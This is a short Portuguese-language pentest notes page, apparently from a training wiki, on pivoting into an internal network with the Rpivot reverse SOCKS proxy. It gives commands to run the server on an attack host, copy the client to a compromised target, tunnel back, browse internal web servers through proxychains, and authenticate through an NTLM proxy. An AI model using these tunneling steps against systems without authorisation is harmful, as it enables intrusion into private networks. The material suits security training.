Web Server Pivoting with Rpivot

Rpivot é uma ferramenta de proxy SOCKS reverso escrita em Python para tunelamento SOCKS. Rpivot vincula uma máquina dentro de uma rede corporativa a um servidor externo e expõe a porta local do cliente no lado do servidor.

Cloning rpivot

sudo git clone https://github.com/klsecservices/rpivot.git

Installing Python2.7

sudo apt-get install python2.7

Executando server.py do Host de Ataque

python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Antes de executar, client.pyprecisaremos transferir rpivot para o alvo. Podemos fazer isso usando este comando SCP:

scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

Executando client.py do Pivot Target

python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

Navegando até o servidor web de destino usando Proxychains

proxychains firefox-esr 172.16.5.135:80

Conectando-se a um servidor Web usando HTTP-Proxy e autenticação NTLM

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

PreviousSSH Pivoting with Sshuttle NextPort Forwarding with Windows Netsh

Last updated 10 months ago